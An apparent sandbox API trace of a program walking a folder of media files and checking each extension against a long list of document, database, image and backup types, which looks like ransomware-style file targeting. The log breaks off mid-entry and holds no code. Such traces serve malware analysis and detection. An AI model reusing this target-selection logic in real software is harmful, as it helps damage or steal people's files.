hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703015e6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x703015e6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d35f55b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1168, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="NextMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0036.251] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70327743, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70327743, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dbda349, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc04, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="NextMenuButtonIconSubpictur.png", cAlternateFileName="")) returned 1 [0036.251] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70184844, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70184844, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dc26605, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa942c, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="Notes_loop.wmv", cAlternateFileName="")) returned 1 [0036.251] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7021cdb8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7021cdb8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dc728c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbebec, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="Notes_loop_PAL.wmv", cAlternateFileName="")) returned 1 [0036.252] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7015e6e7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7015e6e7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11ad, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="ParentMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0036.252] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7015e6e7, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7015e6e7, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbef, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="ParentMenuButtonIconSubpict.png", cAlternateFileName="")) returned 1 [0036.252] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70053d5c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70053d5c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x629b, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="performance.png", cAlternateFileName="")) returned 1 [0036.252] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700a0016, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700a0016, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1b0a, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="Perf_Scenes_Mask1.png", cAlternateFileName="")) returned 1 [0036.252] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dd7d253, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135f, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="Perf_Scenes_Subpicture1.png", cAlternateFileName="")) returned 1 [0036.252] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70269072, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70269072, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1197, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="PreviousMenuButtonIcon.png", cAlternateFileName="")) returned 1 [0036.252] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x702b532c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x702b532c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc0a, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="PreviousMenuButtonIconSubpi.png", cAlternateFileName="")) returned 1 [0036.253] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700ec2d0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700ec2d0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc24, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="redmenu.png", cAlternateFileName="")) returned 1 [0036.253] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70327743, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70327743, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ddc950f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8232c, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="Scene_loop.wmv", cAlternateFileName="")) returned 1 [0036.253] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70399b5a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70399b5a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4de61a87, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x95bac, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="Scene_loop_PAL.wmv", cAlternateFileName="")) returned 1 [0036.253] FindNextFileW (in: hFindFile=0x3ef1300, lpFindFileData=0x33ff094 | out: lpFindFileData=0x33ff094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7011242d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7011242d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x0, dwReserved1=0x33ff1f4, cFileName="TitleButtonIcon.png", cAlternateFileName="")) returned 1 [0036.253] lstrlenW (lpString="TitleButtonIcon.png") returned 19 [0036.253] lstrlenW (lpString=".1cd") returned 4 [0036.253] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0036.253] lstrlenW (lpString=".3ds") returned 4 [0036.253] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0036.253] lstrlenW (lpString=".3fr") returned 4 [0036.253] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0036.253] lstrlenW (lpString=".3g2") returned 4 [0036.253] lstrcmpiW (lpString1=".3g2", lpString2=".png") returned -1 [0036.253] lstrlenW (lpString=".3gp") returned 4 [0036.253] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".7z") returned 3 [0036.254] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0036.254] lstrlenW (lpString=".accda") returned 6 [0036.254] lstrcmpiW (lpString1=".accda", lpString2="on.png") returned -1 [0036.254] lstrlenW (lpString=".accdb") returned 6 [0036.254] lstrcmpiW (lpString1=".accdb", lpString2="on.png") returned -1 [0036.254] lstrlenW (lpString=".accdc") returned 6 [0036.254] lstrcmpiW (lpString1=".accdc", lpString2="on.png") returned -1 [0036.254] lstrlenW (lpString=".accde") returned 6 [0036.254] lstrcmpiW (lpString1=".accde", lpString2="on.png") returned -1 [0036.254] lstrlenW (lpString=".accdt") returned 6 [0036.254] lstrcmpiW (lpString1=".accdt", lpString2="on.png") returned -1 [0036.254] lstrlenW (lpString=".accdw") returned 6 [0036.254] lstrcmpiW (lpString1=".accdw", lpString2="on.png") returned -1 [0036.254] lstrlenW (lpString=".adb") returned 4 [0036.254] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".adp") returned 4 [0036.254] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".ai") returned 3 [0036.254] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0036.254] lstrlenW (lpString=".ai3") returned 4 [0036.254] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".ai4") returned 4 [0036.254] lstrcmpiW (lpString1=".ai4", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".ai5") returned 4 [0036.254] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".ai6") returned 4 [0036.254] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".ai7") returned 4 [0036.254] lstrcmpiW (lpString1=".ai7", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".ai8") returned 4 [0036.254] lstrcmpiW (lpString1=".ai8", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".anim") returned 5 [0036.254] lstrcmpiW (lpString1=".anim", lpString2="n.png") returned -1 [0036.254] lstrlenW (lpString=".arw") returned 4 [0036.254] lstrcmpiW (lpString1=".arw", lpString2=".png") returned -1 [0036.254] lstrlenW (lpString=".as") returned 3 [0036.254] lstrcmpiW (lpString1=".as", lpString2="png") returned -1 [0036.254] lstrlenW (lpString=".asa") returned 4 [0036.255] lstrcmpiW (lpString1=".asa", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".asc") returned 4 [0036.255] lstrcmpiW (lpString1=".asc", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".ascx") returned 5 [0036.255] lstrcmpiW (lpString1=".ascx", lpString2="n.png") returned -1 [0036.255] lstrlenW (lpString=".asm") returned 4 [0036.255] lstrcmpiW (lpString1=".asm", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".asmx") returned 5 [0036.255] lstrcmpiW (lpString1=".asmx", lpString2="n.png") returned -1 [0036.255] lstrlenW (lpString=".asp") returned 4 [0036.255] lstrcmpiW (lpString1=".asp", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".aspx") returned 5 [0036.255] lstrcmpiW (lpString1=".aspx", lpString2="n.png") returned -1 [0036.255] lstrlenW (lpString=".asr") returned 4 [0036.255] lstrcmpiW (lpString1=".asr", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".asx") returned 4 [0036.255] lstrcmpiW (lpString1=".asx", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".avi") returned 4 [0036.255] lstrcmpiW (lpString1=".avi", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".avs") returned 4 [0036.255] lstrcmpiW (lpString1=".avs", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".backup") returned 7 [0036.255] lstrcmpiW (lpString1=".backup", lpString2="con.png") returned -1 [0036.255] lstrlenW (lpString=".bak") returned 4 [0036.255] lstrcmpiW (lpString1=".bak", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".bay") returned 4 [0036.255] lstrcmpiW (lpString1=".bay", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".bd") returned 3 [0036.255] lstrcmpiW (lpString1=".bd", lpString2="png") returned -1 [0036.255] lstrlenW (lpString=".bin") returned 4 [0036.255] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".bmp") returned 4 [0036.255] lstrcmpiW (lpString1=".bmp", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".bz2") returned 4 [0036.255] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0036.255] lstrlenW (lpString=".c") returned 2 [0036.255] lstrcmpiW (lpString1=".c", lpString2="ng") returned -1 [0036.255] lstrlenW (lpString=".cdr") returned 4 [0036.255] lstrcmpiW (lpString1=".cdr", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".cer") returned 4 [0036.256] lstrcmpiW (lpString1=".cer", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".cf") returned 3 [0036.256] lstrcmpiW (lpString1=".cf", lpString2="png") returned -1 [0036.256] lstrlenW (lpString=".cfc") returned 4 [0036.256] lstrcmpiW (lpString1=".cfc", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".cfm") returned 4 [0036.256] lstrcmpiW (lpString1=".cfm", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".cfml") returned 5 [0036.256] lstrcmpiW (lpString1=".cfml", lpString2="n.png") returned -1 [0036.256] lstrlenW (lpString=".cfu") returned 4 [0036.256] lstrcmpiW (lpString1=".cfu", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".chm") returned 4 [0036.256] lstrcmpiW (lpString1=".chm", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".cin") returned 4 [0036.256] lstrcmpiW (lpString1=".cin", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".class") returned 6 [0036.256] lstrcmpiW (lpString1=".class", lpString2="on.png") returned -1 [0036.256] lstrlenW (lpString=".clx") returned 4 [0036.256] lstrcmpiW (lpString1=".clx", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".config") returned 7 [0036.256] lstrcmpiW (lpString1=".config", lpString2="con.png") returned -1 [0036.256] lstrlenW (lpString=".cpp") returned 4 [0036.256] lstrcmpiW (lpString1=".cpp", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".cr2") returned 4 [0036.256] lstrcmpiW (lpString1=".cr2", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".crt") returned 4 [0036.256] lstrcmpiW (lpString1=".crt", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".crw") returned 4 [0036.256] lstrcmpiW (lpString1=".crw", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".cs") returned 3 [0036.256] lstrcmpiW (lpString1=".cs", lpString2="png") returned -1 [0036.256] lstrlenW (lpString=".css") returned 4 [0036.256] lstrcmpiW (lpString1=".css", lpString2=".png") returned -1 [0036.256] lstrlenW (lpString=".csv") returned 4 [0036.256] lstrcmpiW (lpString1=".csv", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".cub") returned 4 [0036.257] lstrcmpiW (lpString1=".cub", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".dae") returned 4 [0036.257] lstrcmpiW (lpString1=".dae", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".dat") returned 4 [0036.257] lstrcmpiW (lpString1=".dat", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".db") returned 3 [0036.257] lstrcmpiW (lpString1=".db", lpString2="png") returned -1 [0036.257] lstrlenW (lpString=".dbf") returned 4 [0036.257] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".dbx") returned 4 [0036.257] lstrcmpiW (lpString1=".dbx", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".dc3") returned 4 [0036.257] lstrcmpiW (lpString1=".dc3", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".dcm") returned 4 [0036.257] lstrcmpiW (lpString1=".dcm", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".dcr") returned 4 [0036.257] lstrcmpiW (lpString1=".dcr", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".der") returned 4 [0036.257] lstrcmpiW (lpString1=".der", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".dib") returned 4 [0036.257] lstrcmpiW (lpString1=".dib", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".dic") returned 4 [0036.257] lstrcmpiW (lpString1=".dic", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".dif") returned 4 [0036.257] lstrcmpiW (lpString1=".dif", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".divx") returned 5 [0036.257] lstrcmpiW (lpString1=".divx", lpString2="n.png") returned -1 [0036.257] lstrlenW (lpString=".djvu") returned 5 [0036.257] lstrcmpiW (lpString1=".djvu", lpString2="n.png") returned -1 [0036.257] lstrlenW (lpString=".dng") returned 4 [0036.257] lstrcmpiW (lpString1=".dng", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".doc") returned 4 [0036.257] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0036.257] lstrlenW (lpString=".docm") returned 5 [0036.257] lstrcmpiW (lpString1=".docm", lpString2="n.png") returned -1 [0036.258] lstrlenW (lpString=".docx") returned 5 [0036.258] lstrcmpiW (lpString1=".docx", lpString2="n.png") returned -1 [0036.258] lstrlenW (lpString=".dot") returned 4 [0036.258] lstrcmpiW (lpString1=".dot", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".dotm") returned 5 [0036.258] lstrcmpiW (lpString1=".dotm", lpString2="n.png") returned -1 [0036.258] lstrlenW (lpString=".dotx") returned 5 [0036.258] lstrcmpiW (lpString1=".dotx", lpString2="n.png") returned -1 [0036.258] lstrlenW (lpString=".dpx") returned 4 [0036.258] lstrcmpiW (lpString1=".dpx", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".dqy") returned 4 [0036.258] lstrcmpiW (lpString1=".dqy", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".dsn") returned 4 [0036.258] lstrcmpiW (lpString1=".dsn", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".dt") returned 3 [0036.258] lstrcmpiW (lpString1=".dt", lpString2="png") returned -1 [0036.258] lstrlenW (lpString=".dtd") returned 4 [0036.258] lstrcmpiW (lpString1=".dtd", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".dwg") returned 4 [0036.258] lstrcmpiW (lpString1=".dwg", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".dwt") returned 4 [0036.258] lstrcmpiW (lpString1=".dwt", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".dx") returned 3 [0036.258] lstrcmpiW (lpString1=".dx", lpString2="png") returned -1 [0036.258] lstrlenW (lpString=".dxf") returned 4 [0036.258] lstrcmpiW (lpString1=".dxf", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".edml") returned 5 [0036.258] lstrcmpiW (lpString1=".edml", lpString2="n.png") returned -1 [0036.258] lstrlenW (lpString=".efd") returned 4 [0036.258] lstrcmpiW (lpString1=".efd", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".elf") returned 4 [0036.258] lstrcmpiW (lpString1=".elf", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".emf") returned 4 [0036.258] lstrcmpiW (lpString1=".emf", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".emz") returned 4 [0036.258] lstrcmpiW (lpString1=".emz", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".epf") returned 4 [0036.258] lstrcmpiW (lpString1=".epf", lpString2=".png") returned -1 [0036.258] lstrlenW (lpString=".eps") returned 4 [0036.259] lstrcmpiW (lpString1=".eps", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".epsf") returned 5 [0036.259] lstrcmpiW (lpString1=".epsf", lpString2="n.png") returned -1 [0036.259] lstrlenW (lpString=".epsp") returned 5 [0036.259] lstrcmpiW (lpString1=".epsp", lpString2="n.png") returned -1 [0036.259] lstrlenW (lpString=".erf") returned 4 [0036.259] lstrcmpiW (lpString1=".erf", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".exr") returned 4 [0036.259] lstrcmpiW (lpString1=".exr", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".f4v") returned 4 [0036.259] lstrcmpiW (lpString1=".f4v", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".fido") returned 5 [0036.259] lstrcmpiW (lpString1=".fido", lpString2="n.png") returned -1 [0036.259] lstrlenW (lpString=".flm") returned 4 [0036.259] lstrcmpiW (lpString1=".flm", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".flv") returned 4 [0036.259] lstrcmpiW (lpString1=".flv", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".frm") returned 4 [0036.259] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".fxg") returned 4 [0036.259] lstrcmpiW (lpString1=".fxg", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".geo") returned 4 [0036.259] lstrcmpiW (lpString1=".geo", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".gif") returned 4 [0036.259] lstrcmpiW (lpString1=".gif", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".grs") returned 4 [0036.259] lstrcmpiW (lpString1=".grs", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".gz") returned 3 [0036.259] lstrcmpiW (lpString1=".gz", lpString2="png") returned -1 [0036.259] lstrlenW (lpString=".h") returned 2 [0036.259] lstrcmpiW (lpString1=".h", lpString2="ng") returned -1 [0036.259] lstrlenW (lpString=".hdr") returned 4 [0036.259] lstrcmpiW (lpString1=".hdr", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".hpp") returned 4 [0036.259] lstrcmpiW (lpString1=".hpp", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".hta") returned 4 [0036.259] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0036.259] lstrlenW (lpString=".htc") returned 4 [0036.259] lstrcmpiW (lpString1=".htc", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".htm") returned 4 [0036.260] lstrcmpiW (lpString1=".htm", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".html") returned 5 [0036.260] lstrcmpiW (lpString1=".html", lpString2="n.png") returned -1 [0036.260] lstrlenW (lpString=".icb") returned 4 [0036.260] lstrcmpiW (lpString1=".icb", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".ics") returned 4 [0036.260] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".iff") returned 4 [0036.260] lstrcmpiW (lpString1=".iff", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".inc") returned 4 [0036.260] lstrcmpiW (lpString1=".inc", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".indd") returned 5 [0036.260] lstrcmpiW (lpString1=".indd", lpString2="n.png") returned -1 [0036.260] lstrlenW (lpString=".ini") returned 4 [0036.260] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".iqy") returned 4 [0036.260] lstrcmpiW (lpString1=".iqy", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".j2c") returned 4 [0036.260] lstrcmpiW (lpString1=".j2c", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".j2k") returned 4 [0036.260] lstrcmpiW (lpString1=".j2k", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".java") returned 5 [0036.260] lstrcmpiW (lpString1=".java", lpString2="n.png") returned -1 [0036.260] lstrlenW (lpString=".jp2") returned 4 [0036.260] lstrcmpiW (lpString1=".jp2", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".jpc") returned 4 [0036.260] lstrcmpiW (lpString1=".jpc", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".jpe") returned 4 [0036.260] lstrcmpiW (lpString1=".jpe", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".jpeg") returned 5 [0036.260] lstrcmpiW (lpString1=".jpeg", lpString2="n.png") returned -1 [0036.260] lstrlenW (lpString=".jpf") returned 4 [0036.260] lstrcmpiW (lpString1=".jpf", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".jpg") returned 4 [0036.260] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0036.260] lstrlenW (lpString=".jpx") returned 4 [0036.261] lstrcmpiW (lpString1=".jpx", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".js") returned 3 [0036.261] lstrcmpiW (lpString1=".js", lpString2="png") returned -1 [0036.261] lstrlenW (lpString=".jsf") returned 4 [0036.261] lstrcmpiW (lpString1=".jsf", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".json") returned 5 [0036.261] lstrcmpiW (lpString1=".json", lpString2="n.png") returned -1 [0036.261] lstrlenW (lpString=".jsp") returned 4 [0036.261] lstrcmpiW (lpString1=".jsp", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".kdc") returned 4 [0036.261] lstrcmpiW (lpString1=".kdc", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".kmz") returned 4 [0036.261] lstrcmpiW (lpString1=".kmz", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".kwm") returned 4 [0036.261] lstrcmpiW (lpString1=".kwm", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".lasso") returned 6 [0036.261] lstrcmpiW (lpString1=".lasso", lpString2="on.png") returned -1 [0036.261] lstrlenW (lpString=".lbi") returned 4 [0036.261] lstrcmpiW (lpString1=".lbi", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".lgf") returned 4 [0036.261] lstrcmpiW (lpString1=".lgf", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".lgp") returned 4 [0036.261] lstrcmpiW (lpString1=".lgp", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".log") returned 4 [0036.261] lstrcmpiW (lpString1=".log", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".m1v") returned 4 [0036.261] lstrcmpiW (lpString1=".m1v", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".m4a") returned 4 [0036.261] lstrcmpiW (lpString1=".m4a", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".m4v") returned 4 [0036.261] lstrcmpiW (lpString1=".m4v", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".max") returned 4 [0036.261] lstrcmpiW (lpString1=".max", lpString2=".png") returned -1 [0036.261] lstrlenW (lpString=".md") returned 3 [0036.261] lstrcmpiW (lpString1=".md", lpString2="png") returned -1 [0036.262] lstrlenW (lpString=".mda") returned 4 [0036.262] lstrcmpiW (lpString1=".mda", lpString2=".png") returned -1 [0036.262] lstrlenW (lpString=".mdb") returned 4 [0036.262] lstrcmpiW (lpString1=".mdb", lpString2=".png") returned -1 [0036.262] lstrlenW (lpString=".mde") returned 